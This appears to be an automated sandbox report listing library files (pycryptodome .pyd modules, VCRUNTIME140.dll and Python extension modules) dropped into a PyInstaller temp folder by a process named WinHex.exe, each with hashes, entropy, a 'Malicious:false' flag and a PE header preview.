                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA512.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27136
                                                                                                                      Entropy (8bit):5.916771883983999
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXYElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXr+j
                                                                                                                      MD5:8B152AC4C651824C76DE4850C96DF5E0
                                                                                                                      SHA1:7405C46CEB3E4EA419B2BB759FE66BD056AE9D6F
                                                                                                                      SHA-256:2C2C60E30276CCFEE38A9BA22437E635D44C1905F55BEAEACAFBCEB22F82FDDA
                                                                                                                      SHA-512:4A6EFB526C916539DB2005100AE2F18941E7A72B040CB3B12C0BF575300CD341E8F54A5E82CAD10994863AD9733CE918635CB045A51DF7232913DBBD966D4158
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12800
                                                                                                                      Entropy (8bit):4.998403212213497
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:DzzRF/1nb2mhQtk4axusjfkgZhoYDQ6RjcqgQvEty:Dzzd2f64axnTTz5DLgQvEty
                                                                                                                      MD5:4F9B823A8854CC1F3DAD486A46DF9B58
                                                                                                                      SHA1:B3927E404C9E0F120B2E6701F6F22FC5A6823297
                                                                                                                      SHA-256:9051CA4727C10A1E17151F71765529B39E4BF0630A2D34BF5F3FC9FBFBEBD405
                                                                                                                      SHA-512:6B6B7975697AD25A99271B0CBB9D4A8D69FE7303A00582F4492F905221D237E4B38549C5FCEC2A12826AC0B7D417BA6CE1A1A10E52EBDA32C32D5F972F6548C4
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d......e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13312
                                                                                                                      Entropy (8bit):5.024430550992261
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:JF/1nb2mhQtks0iiNqdF4mtPjD0DA5APYcqgYvEL2x:V2f6fFA/4GjD+cgYvEL2x
                                                                                                                      MD5:AE9516E5F80B8DC52E828477B7A7FB88
                                                                                                                      SHA1:E823DAD90FA9B8F432060277B732452EE2AF3C0B
                                                                                                                      SHA-256:EBC0FEEFDE95F93B46181E2A019A0FC17B1E885868A9D2E175977036FFE97AAE
                                                                                                                      SHA-512:799C15F52772EF78422DE01B2B0A4615B5F31FAEDE804D982828ED1B7FAA1154DE4148E4FDE5C254D3C6F081B095401101E4AED18AA48B89B0D1B82C07FFD3BA
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d......e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_keccak.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):16384
                                                                                                                      Entropy (8bit):5.2349270489356945
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:QNTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDgXgvrjcqgCieT3WQ:YafgNpj9cHW3jqXeBRamDRZgCieT
                                                                                                                      MD5:BC69527B01F08D163BDC230D65B45389
                                                                                                                      SHA1:B94830EEDB4A973CDFF9E11A9291313F4CE782C8
                                                                                                                      SHA-256:E5BEE6060733AC03728FA633A86EE3A86B2B72E57FB32A7C11FADF1E695E0248
                                                                                                                      SHA-512:2867FC506540A03759E9D1BAA4788D40066CB40E1D7889AC4B12C7BC6851BE85A693E11549FEF436D73FD04E5377275FAF76446D93F71BA969709A5242D8B1C5
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_poly1305.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15360
                                                                                                                      Entropy (8bit):5.132963036391655
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:AZNGXEgvUh43G6coX2SSwmPL4V7wTdDlIlaY2cqgWjvE:dVMhuGGF2L4STdDqkYWgWjvE
                                                                                                                      MD5:EF29B3A91BD396BC80798E604EC50A13
                                                                                                                      SHA1:9D3EE4CEBA0367C4D53E9EEE85BB2713DDCDFF57
                                                                                                                      SHA-256:E5047A9EFDFF2DED2E8D97E7851CDA4720DEC522A758C30BDF03E4A3D7BEB9FC
                                                                                                                      SHA-512:71C0BBDC5282ACA8FC4329DCCD702D0422607814D540C41D45390F4AE6203C9F87EF21B174DDBB1560A3EFFA30E09518FFD2F18A83AC2E5B6654D5389E33E808
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Math\_modexp.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):35840
                                                                                                                      Entropy (8bit):5.927888759056423
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:DbEkzS7+k9rMUb8cOe9rs9ja+V/Mh8h56GS:DbEP779rMtcOCs0I/M2f
                                                                                                                      MD5:B85B60338399A82F0BF4EC0DB7F9D207
                                                                                                                      SHA1:2E35614994B0DA314FDD8ED1744AABA8C4A81865
                                                                                                                      SHA-256:95CC69008A6B8A3244CF54A4690407866C20F62EB05FA92F5D0739E07F46F8A4
                                                                                                                      SHA-512:E21FAC2E6C7EB2908052971EC71CA9A24D4C50914022E84464CE5CB1F4DFDB5DD0D7B73C65F9F05B02013AAB6FA262F63AC89EED414DA5416FD475F230219D1C
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12288
                                                                                                                      Entropy (8bit):4.798563348198137
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:xEkCfXASTMeAk4OepIXcADpYX6RcqgO5vE:xuJMcPepIXcAD863gO5vE
                                                                                                                      MD5:C6EA84586946A9782EFFA124F207F6CF
                                                                                                                      SHA1:C788A064A0C57EB67689212C674828FF357104D1
                                                                                                                      SHA-256:2651674583DE3CE95E5681E3BB8208A01A4138574C44094305BEEC3E7963D37F
                                                                                                                      SHA-512:6806B7D3D95ADEBB665A0C592DEDED2ADB5FEC9AD9B178D7A9EA04C0156E6B6B43388E92DB979432C09CCAF8237A4EF05E689399126ABB922383170DB8F22CA0
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d......e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):754688
                                                                                                                      Entropy (8bit):7.624959786813075
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:r1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hS:JYmzHoxJFf1p34hcrn5Go9yQO6M
                                                                                                                      MD5:A22A44CBCCCB5D6658B4BC17CBB40387
                                                                                                                      SHA1:75427EB51C79EF969ECA74827CC63DC2C818BD12
                                                                                                                      SHA-256:D18CEFECD7DECFE8D777A0F44C8BD5F899C20930A1ECEADCA18F667EDCCD0C45
                                                                                                                      SHA-512:97E79D1634833B02150895439B8F592752BC91D7DD9F738D62A807F6CC77F8E76233481B3A780F65D6BF525F75AEA2E398E3FFC4FE2A7A14C7C743EDF6ACABD2
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d......e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed25519.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27648
                                                                                                                      Entropy (8bit):5.792403723686486
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsja15gkbQ0e1:qL/g28Ufsxg9GmvPauYLxtX1Dakf
                                                                                                                      MD5:6405600CF9AF7CE732E571A473DC4948
                                                                                                                      SHA1:7B886757450BE12E09DC5E3A5BBEE46FC6B8164B
                                                                                                                      SHA-256:ABE72CF86D7E888C7B2E216B55072FD85FEF0E6089A79A7532728EBFF7C558D1
                                                                                                                      SHA-512:897AF5EB04F3F7630F599C8169EBF13BE5365E80E8597BB16B28ACA5AD0C86EB19FA03E7C019631B62DB66D4D8005E63E83AD8FC414D7AEDFF2D5C82D715BA46
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..........)......................................R......R......RE.....R.....Rich...........PE..d......e.........." ...%.F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text...xD.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B........................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed448.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):67072
                                                                                                                      Entropy (8bit):6.0603101427463635
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:sqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRqpq:sqctkGACFI5t35q2JbgrwwOoqLTM9rMS
                                                                                                                      MD5:344F52CCC83A150A98E6B7121CF42C39
                                                                                                                      SHA1:CF8B3D886FBFEC5FB4C226AC1EC7F88E9DDDDC21
                                                                                                                      SHA-256:F50D64CECCEA8B2A2CD1320084DB5A14A3B21FB0539363D73403D546E32E931B
                                                                                                                      SHA-512:09A7EDF0FCCE080EEA7C5D69776A0E80A89946838F5C9632D4F5AB4C42D335406305C1001BFD2798D3C67ED6C33B6CAF2AB4FFD6737F948D2618EB3B1510A449
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_x25519.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10752
                                                                                                                      Entropy (8bit):4.488398815773202
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:+pVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADzhDTAbcX6gn/7EC:0VddiT7pgTctdErDVDTicqgn/7
                                                                                                                      MD5:734F387058B9B727A5B62825DE18CDCF
                                                                                                                      SHA1:C643069D4F8D5AC84B4EC5201C65686E30FE85A4
                                                                                                                      SHA-256:A705262324FD61378EFF8CB8E56B48C8F9B049644C34701E3D7F96F8CB5061C0
                                                                                                                      SHA-512:F3077E9B075A83A512A50F4059E80DCCE8335EE6C491B2E8B653270EB8040069A314D84F944787BBAF2495FF4B8535217EA238672E7183D11D1E149C1C944FF0
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d......e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10240
                                                                                                                      Entropy (8bit):4.730275068726559
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:fJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGcbMZYJWJcX6gbW6s:7VddiT7pgTctEEaEDKDYMCWJcqgbW6
                                                                                                                      MD5:44A13910DA5086805BD11F4C459728CA
                                                                                                                      SHA1:0B403AD0684034644828CBC983B7AEE8D189C208
                                                                                                                      SHA-256:E1DD2583E46BC40E8E6D6ABCFCBB752C88610502AF3D4078FE5AFD3B18A9F964
                                                                                                                      SHA-512:4E381AFC2BD2978EEF3A395E78A6BB9E3C302D71BF392DBE3F7B2F43EDCAA0A963C91F2AB72BC602B39D1F75B281866F7F6971617D713F8610736CDD31FFC230
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d......e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10240
                                                                                                                      Entropy (8bit):4.685487750004037
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:ugZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DYWMoG4BcX6gbW6O:uuVddiT7pgTctEEO3DioHcqgbW6
                                                                                                                      MD5:DCAC334A352EF600574C52FDF30F96A1
                                                                                                                      SHA1:A3668AE8121981E3B173C250DE0FC8BD2066CF89
                                                                                                                      SHA-256:560A6D183CE437B847BFB7B7D4A98F22EA72FB365FBC2EC73DDD1BD8BE1C6E4D
                                                                                                                      SHA-512:6CDAAEEF78E29D4292EE475D50D8187F6754AD99250EF9732F2EA2439941AF5FD05DB4EC6D88FA1B9BA8420CE9700AA2EB5412D7B28196107D5F126CD7F2E440
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d......e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\VCRUNTIME140.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):94088
                                                                                                                      Entropy (8bit):6.4315064777018955
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:bS6NH9M7vShoxXqYGZLAy10i5XNS83NT/sM9MYDiRecbbVKKoB98:bFRmxXqX0yvX7mHYWRecbb8l
                                                                                                                      MD5:7942BE5474A095F673582997AE3054F1
                                                                                                                      SHA1:E982F6EBC74D31153BA9738741A7EEC03A9FA5E8
                                                                                                                      SHA-256:8EE6B49830436FF3BEC9BA89213395427B5535813930489F118721FD3D2D942C
                                                                                                                      SHA-512:49FBC9D441362B65A8D78B73D4FDCF988F22D38A35A36A233FCD54E99E95E29B804BE7EABE2B174188C7860EBB34F701E13ED216F954886A285BED7127619039
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(r%Ml.K.l.K.l.K....n.K.ek..g.K.l.J.@.K..bH.a.K..bO.|.K..bN.s.K..bK.m.K..b..m.K..bI.m.K.Richl.K.........................PE..d...".._.........." .........^............................................................`A.........................................1..4....9.......p.......P.......L...#..........H...T...............................8............................................text............................... ..`.rdata...?.......@..................@..@.data...@....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):87608
                                                                                                                      Entropy (8bit):6.406217429501724
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:m9txcZQWVujgkdI0Ls7PacKYyTFQ+DM9D8VXBPpt3nl7+xIX4VfybUfA:MvkQAFis7acHyTFNDM6VXBPpt3oxIX4I
                                                                                                                      MD5:6FD0281BCA7EEE0F354A91F958714EDB
                                                                                                                      SHA1:C7F643955D589F6D3093459327DCAAB3B7AE4A32
                                                                                                                      SHA-256:03D8966F4D8AB347140A3AD9938FB91DB11E01E028E980721451070EB0483CF7
                                                                                                                      SHA-512:86B2944ACAC0601273A7534B5698991ED0475CC3F913F179FAD27AA8CB7732EA56D9E70B6E959FB55795384ED652565586B8A10474864DAA4874321F31B4A416
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8.8.Y.k.Y.k.Y.k.!Rk.Y.k#(.j.Y.k...k.Y.k#(.j.Y.k#(.j.Y.k#(.j.Y.k.+.j.Y.k.1.j.Y.k.Y.k.Y.k.+.j.Y.k.+.j.Y.k.+>k.Y.k.+.j.Y.kRich.Y.k........................PE..d...B.._.........." .........h.....................................................rh....`..........................................&..H...8'.......`.......P..L....8..8....p..........T...............................8...............H............................text............................... ..`.rdata..2C.......D..................@..@.data........@......................@....pdata..L....P....... ..............@..@.rsrc........`.......*..............@..@.reloc.......p.......6..............@..B........................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):127032
                                                                                                                      Entropy (8bit):5.929945996813773
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:nf738EmBkP4rwNngxk6GWewujpufeTxJIphtNIXVP8n:nr0W4sWk6xdfeTzI5Hn
                                                                                                                      MD5:DA2FF1686AB85C37A2A247BB8595C258
                                                                                                                      SHA1:2168B91CD87F89F9A5590775BD6610EABC5D4CB7
                                                                                                                      SHA-256:279560B61E20B869A059A103FB010093F9E367420BC81182646E357DE8B9740F
                                                                                                                      SHA-512:7711CB3A8302AF491BE5A33923032BE4633400EE5C5D65937307F8C5E14674F0F32C96569E77FE894728A9F4DBA1FBC43A984E8BD262721B0F8949D8F7BB93F3
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{1..._..._..._..b..._.Zk^..._.ZkZ..._.Zk[..._.Zk\..._.rh^..._..r[..._..r^..._.~s^..._...^..._.rhR..._.rh_..._.rh...._.rh]..._.Rich.._.................PE..d...C.._.........." ................X^..............................................g_....`......................................... t.......t..........................8...........l-..T............................-..8............ ..p............................text............................... ..`.rdata...o... ...p..................@..@.data....?.......:...v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):47672
                                                                                                                      Entropy (8bit):5.989015440500447
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:ombGJMgxzB7992zIyYsw3jY2rV4h6lievW4SJIXsI7mDG4yYBUf2h:omaJxxVMn0cs4mfv4JIXsI7yy+Uf
                                                                                                                      MD5:3400DA54FAF3C3128F9C9E126A881BE0
                                                                                                                      SHA1:6352074113ECB5B5ECF0442D70898F2ACB933E91
                                                                                                                      SHA-256:68913D6D5102D32DDDF5A21A4770AC2791F29106C0D2D3A3D0192356EA366C66
                                                                                                                      SHA-512:D9D9CA6A27792AF60E36FAB9D623BCDD9727EFD565CD8C3787DA70F10E168DED90D9208F9C9C56A5815AB316779DC05DC799FBF8E327C9EF18765C6C529886C4
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...............|M.....Nu......Nu......Nu......Nu......fv......l......km.............fv......fv......fv!.....fv......Rich............................PE..d...B.._.........." .....B...\.......1...............................................(....`.........................................@...P...............................8...........4h..T............................h..8............`...............................text...6@.......B.................. ..`.rdata...5...`...6...F..............@..@.data...x............|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):163896
                                                                                                                      Entropy (8bit):6.761466336533283
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:w4V6lmD0H/D/D55QufWicmvCcr6ayP4znfY9mNoBnCsYIXznxIXH1bi:w4V6lmD0fD/bBym2ZmgYOB0IDn4i
                                                                                                                      MD5:0CAA4DA7B74FC8E8F08BA736274BDB46
                                                                                                                      SHA1:4B46DC22C81FA3558537249C994614DEF1FD8CCE
                                                                                                                      SHA-256:167C5550B93541C703C8AFEB4D912719D5039230A7EFCE8F4BC500F175252ED8
                                                                                                                      SHA-512:47F1F338EA4055A4B88691EBB511EE95D29943AA7D519A7D5F513BEF26641990C1F31AD2839E7ED0342A5A262255B770CA922F7D173C998E0FF11C594BF8EFAB
                                                                                                                      Malicious:false
